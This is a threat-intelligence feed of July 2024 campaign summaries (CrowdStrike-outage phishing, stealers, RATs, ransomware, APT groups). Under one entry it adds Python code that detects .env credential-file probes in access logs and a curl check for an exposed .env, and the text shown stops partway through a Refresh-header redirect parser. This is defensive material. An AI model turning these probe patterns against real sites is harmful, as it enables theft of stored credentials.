Additional Source: https://www.reliaquest.com/blog/crowdstrike-outage-script-phishing-and-social-engineering-attacks/
Additional Source: https://socradar.io/suspicious-domains-exploiting-the-recent-crowdstrike-outage/
Additional Source: https://cyble.com/blog/threat-actors-exploit-recent-crowdstrike-outage-to-ramp-up-suspicious-domain-creation/
Multiple cybersecurity firms have observed that threat actors are exploiting the massive business disruption caused by CrowdStrike's faulty update on Friday to target companies with data wipers and remote access tools. ReliaQuest researchers have warned about fake PowerShell and batch scripts posing as fixes, likely to appear on platforms like GitHub. These scripts are capable of installing malicious software such as Cobalt Strike, which allows unauthorized access to systems. AnyRun and SOCRadar researchers have observed a surge in phishing scams and malware targeting users impacted by the CrowdStrike incident, often disguised as legitimate updates or hotfixes. Moreover, Cyble researchers have analyzed suspicious domains registered by threat actors taking advantage of the CrowdStrike outage.
Source: https://any.run/cybersecurity-blog/crowdstrike-outage-abuse/
2024-07-24
Fake_Repair_Files_Use_in_Crowdstrike_Issue
HIGH
Intel Source:
Antiy
Intel Name:
Fake_Repair_Files_Use_in_Crowdstrike_Issue
Date of Scan:
2024-07-24
Impact:
HIGH
Summary:
Researchers at Antiy CERT have discovered that cyber criminals are taking advantage of the CrowdStrike issue to spread malware, including RemCos remote control, a data-stealing Trojan, and a data-erasing wiper. Researchers also found that threat actors are using fake repair documents embedded with hidden macros that download a Trojan, which steals sensitive information from browsers and sends it to a command server. In another case, the Handala Hack group conducts phishing campaigns disguised as CrowdStrike support, targeting Israeli institutions and spreading malicious code through fake repair documents.
Source: https://www.antiy.cn/research/notice&report/research_report/Disguise_CrowdStrike_Trojan.html
2024-07-24
Exploiting_CVE_2024_21412
MEDIUM
Intel Source:
Fortinet
Intel Name:
Exploiting_CVE_2024_21412
Date of Scan:
2024-07-24
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have uncovered a malicious campaign exploiting a security flaw known as CVE-2024-21412. In this campaign, attackers trick victims into clicking a link that downloads a harmful LNK file onto their computer. This file then downloads another program containing a hidden script. When run, the script activates, decrypts hidden PowerShell code, and accesses more files and URLs, including fake PDF documents and a harmful code injector. These files work together to install a data-stealing program into legitimate processes on the victim's computer, ultimately sending the stolen data back to the attackers' command-and-control server.
Source: https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed
2024-07-24
Patchwork_Group_Using_Brute_Ratel_C4_and_PGoShell
LOW
Intel Source:
Knownsec 404 team
Intel Name:
Patchwork_Group_Using_Brute_Ratel_C4_and_PGoShell
Date of Scan:
2024-07-24
Impact:
LOW
Summary:
The Knownsec 404 Advanced Threat Intelligence Team has identified a suspected cyber attack by the Patchwork group targeting Bhutan. The attack uses an updated variant of the Go language backdoor known as PGoShell, which significantly enhances its functionality. What makes this different from earlier attacks is the inclusion, for the first time, of Brute Ratel C4, a red team tool, in the group's arsenal. Over the last two years, the Patchwork group has shown steady technical progress, constantly refreshing its techniques and increasing the number of trojans and delivery mechanisms it uses.
Source: https://medium.com/@knownsec404team/the-patchwork-group-has-updated-its-arsenal-launching-attacks-for-the-first-time-using-brute-ratel-175741987d87
2024-07-24
BORN_Group_Supply_Chain_Breach
MEDIUM
Intel Source:
CloudSEK
Intel Name:
BORN_Group_Supply_Chain_Breach
Date of Scan:
2024-07-24
Impact:
MEDIUM
Summary:
CloudSEK researchers have examined a major supply chain attack on the IT service provider BORN Group. The threat actor, Intelbroker, exploited CVE-2024-23897 to break into BORN Group's systems and extract sensitive data belonging to many customers. In addition, Intelbroker claims to have successfully breached the Market database, which has led to the personal information of approximately 196,000 being exposed.
Source: https://www.cloudsek.com/blog/born-group-supply-chain-breach-in-depth-analysis-of-intelbrokers-jenkins-exploitation
2024-07-24
Operation_ShadowCat
LOW
Intel Source:
Cyble
Intel Name:
Operation_ShadowCat
Date of Scan:
2024-07-24
Impact:
LOW
Summary:
Researchers at CRIL have discovered a fake Office document that is actually a shortcut (.LNK) file. When a user opens this file, it runs a PowerShell command to drop and execute a .NET loader on the victim's machine. The PowerShell script then fetches a hidden payload from a PNG image on a remote server and injects it into the PowerShell process to avoid detection. This attack is called Operation ShadowCat. The payload is a RAT written in Go that controls the infected machine and deploys ransomware. The campaign targets individuals interested in Indian politics, including government officials, political analysts, and journalists who follow parliamentary activities closely.
Source: https://cyble.com/blog/operation-shadowcat-targeting-indian-political-observers-via-a-stealthy-rat/
2024-07-23
Threat_Actors_Target_Recent_Election_Results
LOW
Intel Source:
K7 Security Labs
Intel Name:
Threat_Actors_Target_Recent_Election_Results
Date of Scan:
2024-07-23
Impact:
LOW
Summary:
Researchers at K7 Security Labs discovered the Crimson RAT malware being used in attacks related to the recent Indian election results. This RAT is used by the threat actor Transparent Tribe, a group believed to operate out of Pakistan that has been active since 2013. Crimson RAT is capable of stealing credentials, gathering system information, monitoring running processes, deleting files, and downloading more malware. Researchers also found an Excel file disguised as a syllabus from a university in Delhi. The group's primary focus is on infiltrating diplomatic, defence, and research entities located in India and Afghanistan.
Source: https://labs.k7computing.com/index.php/threat-actors-target-recent-election-results/
2024-07-23
Recent_Activities_of_BlackBasta_Ransomware
LOW
Intel Source:
ANY RUN
Intel Name:
Recent_Activities_of_BlackBasta_Ransomware
Date of Scan:
2024-07-23
Impact:
LOW
Summary:
Researchers at AnyRun have identified new operations involving BlackBasta ransomware, which Storm-1811 has managed since its appearance in 2022. The group uses double extortion, encrypting data and then demanding payment, and relies on spear-phishing to gain initial access. QakBot and Cobalt Strike are among the tools used by this notorious group, which exploits system vulnerabilities and employs sophisticated obfuscation techniques to evade detection.
Source: https://any.run/malware-trends/blackbasta/?utm_source=twitter&utm_medium=post&utm_campaign=blackbasta&utm_content=blog&utm_term=220724
2024-07-23
Daggerfly_Update_Their_Toolset
LOW
Intel Source:
Symantec
Intel Name:
Daggerfly_Update_Their_Toolset
Date of Scan:
2024-07-23
Impact:
LOW
Summary:
Researchers at Symantec have uncovered the new toolkit of the espionage group called Daggerfly, also known as Evasive Panda or Bronze Highland. This group has been active for over a decade and is known for its MgBot framework. They have introduced new malware and updated their Macma macOS backdoor. Additionally, Daggerfly introduced Suzafk, a Windows backdoor that can use TCP or OneDrive for command-and-control. These tools share a common code library, showing their connection to Daggerfly. The group is using these new tools in recent attacks on organizations in Taiwan and a U.S. NGO based in China.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/daggerfly-espionage-updated-toolset
2024-07-23
CrowdStrike_Outage_Exploitation_Via_Malware_and_Ecrime
HIGH
Intel Source:
Securonix
Intel Name:
CrowdStrike_Outage_Exploitation_Via_Malware_and_Ecrime
Date of Scan:
2024-07-23
Impact:
HIGH
Summary:
Securonix threat researchers have discovered that threat actors are exploiting a recent outage in CrowdStrike's Falcon sensor to spread malware and carry out eCrime operations. They are sending phishing emails, setting up scam websites, and creating fake domains to distribute malware. In one case, victims received phishing emails with a file called crowdstrike-hotfix.zip. This file contains Spanish-language instructions for a fake recovery tool. When opened, it installs HijackLoader, which then loads Remcos RAT and gives attackers full access to the victim's system.
Source: https://www.securonix.com/blog/threat-actors-are-exploiting-the-recent-crowdstrike-outage-in-an-effort-to-deploy-malware-and-to-stage-ecrime-operations/
2024-07-23
Daolpu_Stealer_via_Fake_Recovery_Manual
LOW
Intel Source:
Crowdstrike
Intel Name:
Daolpu_Stealer_via_Fake_Recovery_Manual
Date of Scan:
2024-07-23
Impact:
LOW
Summary:
Researchers from the CrowdStrike Intelligence team have discovered a malicious Word document posing as a Microsoft recovery manual. This document contains macros that download a newly identified stealer called Daolpu. The threat actor's use of a fake recovery manual is a tactic to deceive victims and distribute the stealer. Initial analysis suggests that this activity is likely criminally motivated, highlighting the ongoing threat of sophisticated phishing attacks and the need for vigilance against malicious documents.
Source: https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/
2024-07-23
CrowdStrike_BSOD_Exploited_for_Malware
LOW
Intel Source:
X (Twitter)
Intel Name:
CrowdStrike_BSOD_Exploited_for_Malware
Date of Scan:
2024-07-23
Impact:
LOW
Summary:
Researchers from Zscaler ThreatLabz have observed that threat actors are exploiting a CrowdStrike BSOD bug to spread malware. They discovered a phishing campaign involving a Microsoft Word document that appears to provide recovery instructions. This document contains a malicious macro that, when activated, downloads an information-stealing malware with low detection rates.
Source: https://x.com/Threatlabz/status/1815442461545951710
2024-07-23
An_Overview_of_Braodo_Stealer
LOW
Intel Source:
K7 Security Labs
Intel Name:
An_Overview_of_Braodo_Stealer
Date of Scan:
2024-07-23
Impact:
LOW
Summary:
In recent months, K7 Security Labs has seen an increase in tweets discussing the emergence of Vietnam-based malware known as Braodo Stealer. They explored the intricacies of Braodo, an information stealer capable of accessing victims' systems and harvesting sensitive information such as credentials and banking information, leading to identity theft and financial damage.
Source: https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/
2024-07-22
Hackers_Exploiting_CrowdStrike_Update
HIGH
Intel Source:
Crowdstrike
Intel Name:
Hackers_Exploiting_CrowdStrike_Update
Date of Scan:
2024-07-22
Impact:
HIGH
Summary:
On July 19, 2024, a CrowdStrike Falcon sensor update was found to cause a problem affecting Windows hosts; the issue was fixed immediately. Afterwards, CrowdStrike Intelligence identified threat actors exploiting the event by distributing a malicious ZIP file named crowdstrike-hotfix.zip across the globe. This ZIP archive carries a HijackLoader payload designed to launch RemCos upon execution. The campaign appears to be aimed at Latin American (LATAM) CrowdStrike customers, as evidenced by the Spanish filenames and instructions found in the ZIP files.
Source: https://www.crowdstrike.com/blog/likely-ecrime-actor-capitalizing-on-falcon-sensor-issues/
2024-07-22
Case_Studies_of_Volt_Typhoon
LOW
Intel Source:
Intel471
Intel Name:
Case_Studies_of_Volt_Typhoon
Date of Scan:
2024-07-22
Impact:
LOW
Summary:
On May 23, 2023, a joint advisory from the United States, Australia, New Zealand, Canada, and the United Kingdom raised concerns about Volt Typhoon, a Chinese state-sponsored threat actor that targets critical infrastructure worldwide. It has sophisticated ways of infiltrating networks, such as exploiting vulnerabilities in widely used network products to gain access undetected. The group seems more interested in disruption than traditional espionage, with a focus on sectors such as communications, energy, and transport. Newer advisories have documented updates to its tactics while providing threat hunting strategies that can be employed to identify the group in IT environments.
Source: https://intel471.com/blog/threat-hunting-case-study-looking-for-volt-typhoon
2024-07-22
Crowdstrike_Phishing_Update_July_22
HIGH
Intel Source:
LinkedIn
Intel Name:
Crowdstrike_Phishing_Update_July_22
Date of Scan:
2024-07-22
Impact:
HIGH
Summary:
On July 19, 2024, CrowdStrike identified and resolved an issue in a content update for their Falcon sensor affecting Windows systems. In response, threat actors have been observed exploiting this event through various social engineering tactics, including phishing emails, impersonation of CrowdStrike staff, and offering fraudulent remediation services. CrowdStrike Intelligence has identified numerous domains impersonating their brand, which may be used for malicious purposes or to spread negative sentiment.
Source: https://www.linkedin.com/feed/update/urn:li:activity:7221114299245551617/
2024-07-22
A_Deep_Dive_Into_RA_World_Ransomware_Group
MEDIUM
Intel Source:
Palo Alto
Intel Name:
A_Deep_Dive_Into_RA_World_Ransomware_Group
Date of Scan:
2024-07-22
Impact:
MEDIUM
Summary:
Researchers from Palo Alto have observed that RA World has become more active on its dark web leak site since March 2024. The group was formerly known as RA Group. They use a dual extortion tactic, first stealing sensitive data from their victims before encrypting it. If the victims refuse to pay the ransom, the group threatens to publish the stolen data online. RA World primarily exploits internet-facing servers to execute its attacks and deploy the final payload, Babuk ransomware. Initially they targeted healthcare organizations but have shifted to the manufacturing sector since mid-2024. The U.S. is the most affected country, followed by countries in Europe, Southeast Asia, and South America.
Source: https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/
2024-07-22
UAC_0063_Attacks_Research_Institutions_of_Ukraine
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0063_Attacks_Research_Institutions_of_Ukraine
Date of Scan:
2024-07-22
Impact:
LOW
Summary:
The cyber attack on a Ukrainian scientific research institution by the UAC-0063 group involved compromising an employee's email account to distribute malicious documents delivering the HATVIBE and CHERRYSPY malicious programs. These documents, initially sent as modified email attachments, contain embedded macros. Opening a document and enabling macros triggered a sequence in which a secondary DOC file created an encoded HTA file (HATVIBE, "RecordsService") and established a scheduled task for persistence ("C:\Windows\System32\Tasks\vManage\StandaloneService").
Source: https://cert.gov.ua/article/6280129
2024-07-22
Hackers_Launching_Campaign_For_Reap_BlueScreen
HIGH
Intel Source:
Cyfirma
Intel Name:
Hackers_Launching_Campaign_For_Reap_BlueScreen
Date of Scan:
2024-07-22
Impact:
HIGH
Summary:
Researchers at CYFIRMA have identified a campaign referred to as Reap BlueScreen in which hackers are looking to profit. As part of this effort, hackers may attempt to cause harm and infiltrate systems by using mass-scale phishing domains to target unsuspecting end users. Their analysis discovered 45+ phishing domains in the wild that may be leveraged to attack users and systems around the world.
Source: https://www.cyfirma.com/research/crowdstrike-falcon-sensor-update-worldwide-blue-screen-of-death-bsod-incident/
2024-07-22
Exploiting_LummaC2_Malware
LOW
Intel Source:
ASEC
Intel Name:
Exploiting_LummaC2_Malware
Date of Scan:
2024-07-22
Impact:
LOW
Summary:
Researchers from ASEC have observed that LummaC2 is using the gaming platform Steam to control its operations. This malware spreads through fake software downloads and online ads, and recently it has been posing as legitimate sites like Notion, Slack, and Capcut. The latest version of LummaC2 can change its control domains anytime, making it harder to detect and stop.
Source: https://asec.ahnlab.com/ko/68023/
2024-07-22
CrowdStrike_Global_Outage
HIGH
Intel Source:
SentinelLabs
Intel Name:
CrowdStrike_Global_Outage
Date of Scan:
2024-07-22
Impact:
HIGH
Summary:
On July 19, 2024, CrowdStrike released a sensor configuration update to Windows systems. This update caused system crashes and Blue Screen of Death (BSOD) errors. The issue disrupted critical services in banks, airlines, hospitals, and IT industries worldwide. In response, threat actors have been using related domains and sending threatening emails to try to extort Bitcoin from their victims.
Source: https://www.sentinelone.com/blog/crowdstrike-global-outage-threat-actor-activity-and-risk-mitigation-strategies/
2024-07-19
HotPage_Adware_Exploitation
LOW
Intel Source:
ESET
Intel Name:
HotPage_Adware_Exploitation
Date of Scan:
2024-07-19
Impact:
LOW
Summary:
Researchers from ESET have discovered a Chinese adware named HotPage, which is distributed as an Internet cafe security solution. HotPage uses a signed, vulnerable driver to inject ads into browsers and intercept network traffic. The driver, signed by Microsoft, unintentionally allows other threats to run code at the SYSTEM privilege level. This shows how adware developers exploit trust-based security models, posing significant risks by leaving systems vulnerable to more dangerous attacks.
Source: https://www.welivesecurity.com/en/eset-research/hotpage-story-signed-vulnerable-ad-injecting-driver/
2024-07-19
Play_Ransomware_Targets_ESXi
LOW
Intel Source:
Trend Micro
Intel Name:
Play_Ransomware_Targets_ESXi
Date of Scan:
2024-07-19
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered a new Linux variant of the Play ransomware, specifically targeting ESXi environments. This ransomware first verifies if it is running on an ESXi environment before executing. It has successfully evaded security measures, as indicated by VirusTotal. Additionally, the Play ransomware group appears to be leveraging services and infrastructure associated with the Prolific Puma group.
Source: https://www.trendmicro.com/en_us/research/24/g/new-play-ransomware-linux-variant-targets-esxi-shows-ties-with-p.html
2024-07-19
Lokibot_Malware_Disguised_as_NEAK_Attachments
LOW
Intel Source:
NKI GOV
Intel Name:
Lokibot_Malware_Disguised_as_NEAK_Attachments
Date of Scan:
2024-07-19
Impact:
LOW
Summary:
The National Cyber Security Institute (NBSZ NKI) of the National Security Service from Hungary is issuing an alert regarding harmful attachments abusing the name of the National Health Insurance Fund (NEAK) manager. These attachments contain malware called Lokibot. The primary activity of this malware is data theft, which includes user credentials, passwords, banking information, and other sensitive data from various applications and web browsers.
Source: https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-a-nemzeti-egeszsegbiztositasi-alapkezelo-neak-nevevel-visszaelo-levelekkel-kapcsolatban/
2024-07-19
CrowdStrike_Outage_Phishing
HIGH
Intel Source:
Twitter
Intel Name:
CrowdStrike_Outage_Phishing
Date of Scan:
2024-07-19
Impact:
HIGH
Summary:
Threat actors are leveraging the global CrowdStrike outage of July 19, 2024 to spin up new malicious domains and phishing pages posing as a solution to the issue.
Source: https://x.com/JCyberSec_/status/1814291349610381632
2024-07-19
Fake_Updates_Install_BOINC_Software
LOW
Intel Source:
Huntress
Intel Name:
Fake_Updates_Install_BOINC_Software
Date of Scan:
2024-07-19
Impact:
LOW
Summary:
Researchers at Huntress have discovered new behavior in the SocGholish malware, also known as Fake Updates. This malware campaign spreads infections through fake browser updates on compromised websites. The recent infections include fileless AsyncRAT and a malicious version of BOINC software, a platform for volunteer computing. These infections use heavily obfuscated PowerShell loaders to evade detection. The malicious version of BOINC connects to fake servers, allowing attackers to collect data, transfer files, and execute tasks, which can be sold to other malicious actors or used to deploy ransomware.
Source: https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
2024-07-18
Exploring_WorkersDevBackdoor_and_MadMxShell
LOW
Intel Source:
Threatdown
Intel Name:
Exploring_WorkersDevBackdoor_and_MadMxShell
Date of Scan:
2024-07-18
Impact:
LOW
Summary:
Researchers from ThreatDown have observed a series of malicious Google search ads targeting IT staff. These types of attacks have been seen before. By closely tracking these ads, they discovered shared infrastructure distributing two payloads: the MadMxShell backdoor and the WorkersDevBackdoor. Both malware variants not only share an advert but also have interconnected delivery systems. The C&C server for MadMxShell is directly linked to the WorkersDevBackdoor infrastructure. These malware payloads are capable of stealing sensitive data and providing a gateway for initial access brokers involved in ransomware deployment.
Source: https://www.threatdown.com/blog/workersdevbackdoor-and-madmxshell-converge-in-malvertising-campaigns/
2024-07-18
Ghost_Emperor_Demodex_Returns
LOW
Intel Source:
Sygnia
Intel Name:
Ghost_Emperor_Demodex_Returns
Date of Scan:
2024-07-18
Impact:
LOW
Summary:
The Incident Response team from Sygnia has investigated a client's network that was compromised and leveraged to penetrate one of its business partner's networks in late 2023. Numerous infected servers and workstations were found, all linked to one variant of the Demodex rootkit attributed to the threat group Ghost Emperor. This sophisticated Chinese-linked group focuses mainly on South-East Asian telecommunications and government sectors, using a multi-stage malware approach for stealth and persistence as well as several obfuscation techniques that make analysis difficult. Initial entry typically occurs via ProxyLogon vulnerabilities, followed by a batch file that starts the infection chain.
Source: https://www.sygnia.co/blog/ghost-emperor-demodex-rootkit/
2024-07-18
UAC_0180_Cyberattacks_on_Defense
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0180_Cyberattacks_on_Defense
Date of Scan:
2024-07-18
Impact:
LOW
Summary:
Researchers from CERT-UA observed that the UAC-0180 group is targeting Ukrainian defense enterprises with cyberattacks which involve emails with a ZIP file containing a PDF link. If the victim clicks on the link, the file "adobe_acrobat_fonts_pack.exe" is downloaded, which is classified as the malicious program GLUEEGG, developed using the Go programming language. The main purpose of GLUEEGG is to decrypt (XOR with a 128-byte key) and run the DROPCLUE loader, developed using the Lua programming language.
Source: https://cert.gov.ua/article/6280099
2024-07-18
White_Snake_With_Multi_Stage_Malware_Dropper
LOW
Intel Source:
CyberArmor
Intel Name:
White_Snake_With_Multi_Stage_Malware_Dropper
Date of Scan:
2024-07-18
Impact:
LOW
Summary:
CyberArmor researchers have uncovered a recent tax-invoice-themed campaign. The WhiteSnake stealer is deployed in this campaign through a multi-stage malware dropper. Potential victims receive an email with a tax invoice subject carrying a ZIP file that contains a Windows batch script, which is the first dropper.
Source: https://cyberarmor.tech/white-snake-latest-campaign-with-multi-stage-malware-dropper/
2024-07-18
The_StrelaStealer_Targeting_Email_Credentials
LOW
Intel Source:
Medium (Andrew Petrus)
Intel Name:
The_StrelaStealer_Targeting_Email_Credentials
Date of Scan:
2024-07-18
Impact:
LOW
Summary:
StrelaStealer is a simple yet successful email credential stealer targeting Outlook and Thunderbird clients that is currently active in Europe, mainly Germany. When the malware is executed via a JavaScript attachment included in phishing emails, an obfuscated batch file is dropped to disk. To make its activity harder to read, the batch script makes use of numeric and alphabetical variable names.
Source: https://medium.com/@andrew.petrus/unraveling-strelastealer-5d56e150456e
2024-07-18
MAECI_Themed_Phishing_Campaign
MEDIUM
Intel Source:
CERT-AGID
Intel Name:
MAECI_Themed_Phishing_Campaign
Date of Scan:
2024-07-18
Impact:
MEDIUM
Summary:
CERT-AGID researchers have discovered a phishing website masquerading as the Ministry of Foreign Affairs official webpage for obtaining an Italian visa. The fake website aims to obtain users' login information and passport numbers.
Source: https://x.com/agidcert/status/1813861145662697512?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-18
APT41_Has_Arisen_From_the_DUST
MEDIUM
+
Intel Source:
Google Cloud
Intel Name:
APT41_Has_Arisen_From_the_DUST
Date of Scan:
2024-07-18
Impact:
MEDIUM
Summary:
Google-owned Mandiant researchers have uncovered a long-running campaign by the China-based threat actor APT41. The group targets sectors including global shipping, logistics, media, entertainment, technology, and automotive; most of the affected organizations are in Italy, Spain, Taiwan, Thailand, Turkey, and the United Kingdom. APT41 uses the ANTSWORD and BLUEBEAM web shells to execute the DUSTPAN malware, which in turn deploys the BEACON backdoor for C2 communication. Since 2023, APT41 has infiltrated and maintained unauthorized access to multiple networks, enabling it to steal sensitive data.
Source: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust/
2024-07-18
New_Strain_of_Cactus_Ransomware
LOW
+
Intel Source:
Trellix
Intel Name:
New_Strain_of_Cactus_Ransomware
Date of Scan:
2024-07-18
Impact:
LOW
Summary:
Trellix researchers have analyzed Cactus ransomware, which first appeared in March 2023. It is a well-known double-extortion ransomware that targets multiple commercial entities as well as high-profile victims: in addition to demanding a ransom for file decryption, it threatens to leak the victim's private data if payment is not made. Cactus uses the OpenSSL library for its encryption, combining AES-256-CBC and RSA-4096.
Source: https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/
2024-07-18
New_Domains_of_LockBit_Ransomware
HIGH
+
Intel Source:
X (Twitter)
Intel Name:
New_Domains_of_LockBit_Ransomware
Date of Scan:
2024-07-18
Impact:
HIGH
Summary:
Security researcher Rakesh Krishnan has identified new LockBit domains and chat URLs and shared them on X (Twitter). LockBit ransomware has recently been used in multiple campaigns.
Source: https://x.com/RakeshKrish12/status/1813098858802737636
2024-07-17
Open_Source_Tools_Used_by_TAG_100
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
Open_Source_Tools_Used_by_TAG_100
Date of Scan:
2024-07-17
Impact:
MEDIUM
Summary:
Recorded Future's Insikt Group has detected a cyber-espionage operation attributed to TAG-100 that targets government and private-sector organizations worldwide. The group exploited internet-facing devices and used open-source tools such as the Go backdoor Pantegana. The campaign compromised two Asia-Pacific intergovernmental organizations and targeted multiple diplomatic and trade entities.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0716.pdf
2024-07-17
Breaking_Down_Linux_Gomir
LOW
+
Intel Source:
Splunk
Intel Name:
Breaking_Down_Linux_Gomir
Date of Scan:
2024-07-17
Impact:
LOW
Summary:
Splunk researchers have discussed recent supply chain attacks by the Kimsuky APT group. The group compromised software packages such as TrustPKI and NX_PRNMAN, embedding the GoBear backdoor in them, which allowed the attackers to breach specific systems and gain unauthorized access and control. The emergence of Linux.Gomir, a Linux variant of the GoBear backdoor, shows that this kind of malware remains a constant menace.
Source: https://www.splunk.com/en_us/blog/security/breaking-down-linux-gomir-understanding-this-backdoors-ttps.html
2024-07-17
Handala_Hacker_Group
LOW
+
Intel Source:
Cyberint
Intel Name:
Handala_Hacker_Group
Date of Scan:
2024-07-17
Impact:
LOW
Summary:
Cyberint researchers have profiled a hacker group called Handala. The name comes from a character created by Palestinian political cartoonist Naji al-Ali in 1969. The group operates primarily through a Telegram channel and a Twitter account with multiple subscribers, and also maintains a backup Telegram data-leak channel and its own websites. Handala focuses on cyberattacks against Israeli critical sectors, including phishing, ransomware, and website destruction, with the stated aim of challenging and antagonizing the Israel National Cyber Directorate, which is responsible for Israel's cyber defense.
Source: https://cyberint.com/blog/threat-intelligence/handala-hack-what-we-know-about-the-rising-threat-actor/
2024-07-17
AndroxGh0st_Malware
LOW
+
Intel Source:
ISC.SANS
Intel Name:
AndroxGh0st_Malware
Date of Scan:
2024-07-17
Impact:
LOW
Summary:
Researchers at ISC.SANS have analyzed AndroxGh0st, a Python-based malware that targets .env files in web applications, specifically those built on Laravel, an open-source PHP web framework. AndroxGh0st is part of a botnet operation whose main goal is credential theft, with additional functions such as vulnerability scanning, SMTP abuse, API abuse, and web shell deployment.
Source: https://isc.sans.edu/diary/Who+You+Gonna+Call+AndroxGh0st+Busters+Guest+Diary/31086/
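Because AndroxGh0st's first move is to request `.env` files, the probing is visible in ordinary web server access logs, and the response status tells you whether a probe was merely attempted or actually succeeded. The Python below is an added example, not code from the ISC diary: it parses combined-format log lines (the sample lines are constructed), groups `.env` requests by source IP, and separates the requests the server answered with 2xx, which means the secrets file was served and every credential in it should be rotated.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Apache/nginx "combined" format: ip - user [ts] "METHOD path HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)
# /.env plus the variants scanners try: /.env.bak, /.env.production, /api/.env.local ...
ENV_RE = re.compile(r"(?:^|/)\.env(?:\.[A-Za-z0-9_.-]+)?$")

Probe = Tuple[str, str, str]  # (method, path, status)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_env_probes(lines: List[str]) -> Tuple[Dict[str, List[Probe]], List[Dict[str, str]]]:
    """Group .env requests by source IP and single out the ones the server
    actually answered with 2xx, i.e. the cases where the file was exposed."""
    probes: Dict[str, List[Probe]] = defaultdict(list)
    exposed: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]   # ignore query strings
        if not ENV_RE.search(path):
            continue
        probes[rec["ip"]].append((rec["method"], path, rec["status"]))
        if rec["status"].startswith("2"):
            exposed.append(rec)
    return dict(probes), exposed


# Constructed log lines (not from the diary). One host answers /.env with 200.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Jul/2024:10:01:02 +0000] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.31"',
    '203.0.113.7 - - [17/Jul/2024:10:01:03 +0000] "GET /.env.bak HTTP/1.1" 404 196 "-" "python-requests/2.31"',
    '203.0.113.7 - - [17/Jul/2024:10:01:04 +0000] "POST /api/.env.production HTTP/1.1" 404 196 "-" "python-requests/2.31"',
    '198.51.100.9 - - [17/Jul/2024:10:05:00 +0000] "GET /.env HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [17/Jul/2024:10:06:00 +0000] "GET /environment/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    by_ip, served = find_env_probes(SAMPLE_LOG)
    for ip, hits in by_ip.items():
        print(ip, hits)
    for rec in served:
        print("EXPOSED:", rec["ip"], rec["path"], rec["status"])
```

The preventive check is the same query from the outside: `curl -sI https://your-app.example/.env` should return 403 or 404, never 200, and the `.env` file should live outside the web root in the first place.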
2024-07-17
Killer_Ultra_Malware_Attack_Targeting_EDR_Products
LOW
+
Intel Source:
Binary Defense
Intel Name:
Killer_Ultra_Malware_Attack_Targeting_EDR_Products
Date of Scan:
2024-07-17
Impact:
LOW
Summary:
Binary Defense's ARC Labs researchers have analyzed a new malware named Killer Ultra, which was initially linked to Qilin ransomware activity. The tool specifically targets endpoint detection and response (EDR) and antivirus (AV) software in order to disable them during an attack. Killer Ultra uses the widely known Zemana driver to terminate these defensive processes.
Source: https://www.binarydefense.com/resources/blog/technical-analysis-killer-ultra-malware-targeting-edr-products-in-ransomware-attacks/
2024-07-17
FIN7_Advanced_Tactics_and_Tools
LOW
+
Intel Source:
SentinelLabs
Intel Name:
FIN7_Advanced_Tactics_and_Tools
Date of Scan:
2024-07-17
Impact:
LOW
Summary:
Researchers from SentinelLabs have found that FIN7 uses multiple fake identities to hide its true identity and continue its activities in the underground market. FIN7's campaigns now include automated SQL injection attacks to exploit public-facing applications. The group has also developed a highly specialized tool called AvNeutralizer (also known as AuKill), designed to interfere with security solutions. Recently, a new version of AvNeutralizer was observed using a previously unseen technique to tamper with security solutions, leveraging the Windows built-in driver ProcLaunchMon.sys.
Source: https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/
2024-07-17
Phishing_Campaigns_using_HTTP_Refresh_Header
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Phishing_Campaigns_using_HTTP_Refresh_Header
Date of Scan:
2024-07-17
Impact:
MEDIUM
Summary:
Palo Alto Networks researchers have uncovered a large phishing campaign that uses HTTP Refresh response headers to redirect victims to phishing sites. Because the redirect happens in the response header rather than in the page body or a 3xx Location header, the initial links are harder for URL scanners to flag. However, these links are quickly blocked or taken offline, so the campaigns are short-lived.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-15-IOCs-from-recent-phishing-campaign.txt
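A `Refresh` header makes the browser navigate to a new URL after a delay while the HTTP status stays 200, so tooling that only follows `Location` on 3xx responses never sees the final hop. The Python below is an added example, not Unit 42's tooling or the campaign's code: it parses a raw response head, extracts the refresh target, and flags refreshes that leave the requested host. The response is constructed; the hostnames are placeholders.

```python
import re
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# "Refresh: 5; url=https://..."  (also seen: "0;URL='...'" and comma separators)
_REFRESH_RE = re.compile(
    r"^\s*(?P<delay>\d+(?:\.\d+)?)\s*(?:[;,]\s*url\s*=\s*(?P<url>.+?)\s*)?$",
    re.IGNORECASE,
)


def parse_refresh(value: str) -> Optional[Tuple[float, Optional[str]]]:
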